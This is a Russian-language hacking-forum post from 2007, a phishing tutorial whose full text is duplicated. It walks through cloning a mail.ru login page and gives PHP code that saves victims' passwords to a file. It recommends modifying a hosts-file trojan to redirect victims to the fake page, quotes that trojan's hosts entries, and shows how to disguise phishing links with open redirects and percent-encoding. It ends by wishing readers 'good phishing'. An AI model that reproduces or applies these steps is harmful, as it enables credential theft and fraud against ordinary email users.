bxN5
28.04.2007, 03:17
Все о фейках
Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий
Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая.
Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена.....
1.Задача
Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала.
Дальше нужно найти форму с нашей авторизацией
2.Практика
Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html
_http://www.opennet.ru/base/dev/html_form.txt.html
Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями.
<form action="1.php" method="POST">
<input type="text" name="login">
<input type="password" name="pass">
<select name="dom"><option value="mail.ru">@mail.ru</option>
</select>
<br > <input type="submit" value="Войти">
</form>
Теперь дописываем так,что бы пароли сохранялись у нас:)
if(@$_POST['login']){ условие
$fp = fopen ("file.txt", "a"); открытие файла
fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n"); пишем в файл данные которые ввел юзер на фейковой страничке
fclose ($fp); закрываем файл.
Про работу с файлами на php можно прочитать тут (http://articles.org.ru/cfaq/index.php?qid=87&catid=14)
2.Подводный камень
Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально?
Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам.
В файл hosts добавлены следующие строки:
61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 www.mir5173.com
61.129.75.124 ert0003.e76.163ns.com
219.147.204.249 www.chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com
Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера.
Троян называется Trojan.Win32. Qhost.hq
Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
на свои допустим
127.0.0.1 mail.ru
Да и самому такой вирус написать не особо сложно
Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой
Можно использовать редирект допустим от тех же служб mail.ru.
Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит:)
Но можно придать еше более красивый вид :
известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса
Кодируем forum.antichat.ru и получаем что то вроде
y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61
Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером.
4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема...
4.Заключение
Старался охватить все что знаю про фейки,но уверен что это далеко не все поэтому буду по ходу дописывать,особенно про способы подмены ip.
Спасибо за внимание,удачного фишинга=)
Пишем замечания
Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий
Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая.
Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена.....
1.Задача
Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала.
Дальше нужно найти форму с нашей авторизацией
2.Практика
Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html
_http://www.opennet.ru/base/dev/html_form.txt.html
Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями.
<form action="1.php" method="POST">
<input type="text" name="login">
<input type="password" name="pass">
<select name="dom"><option value="mail.ru">@mail.ru</option>
</select>
<br > <input type="submit" value="Войти">
</form>
Теперь дописываем так,что бы пароли сохранялись у нас:)
if(@$_POST['login']){ условие
$fp = fopen ("file.txt", "a"); открытие файла
fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n"); пишем в файл данные которые ввел юзер на фейковой страничке
fclose ($fp); закрываем файл.
Про работу с файлами на php можно прочитать тут (http://articles.org.ru/cfaq/index.php?qid=87&catid=14)
2.Подводный камень
Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально?
Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам.
В файл hosts добавлены следующие строки:
61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 www.mir5173.com
61.129.75.124 ert0003.e76.163ns.com
219.147.204.249 www.chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com
Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера.
Троян называется Trojan.Win32. Qhost.hq
Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
на свои допустим
127.0.0.1 mail.ru
Да и самому такой вирус написать не особо сложно
Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой
Можно использовать редирект допустим от тех же служб mail.ru.
Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит:)
Но можно придать еше более красивый вид :
известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса
Кодируем forum.antichat.ru и получаем что то вроде
y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61
Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером.
4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема...
4.Заключение
Старался охватить все что знаю про фейки,но уверен что это далеко не все поэтому буду по ходу дописывать,особенно про способы подмены ip.
Спасибо за внимание,удачного фишинга=)
Пишем замечания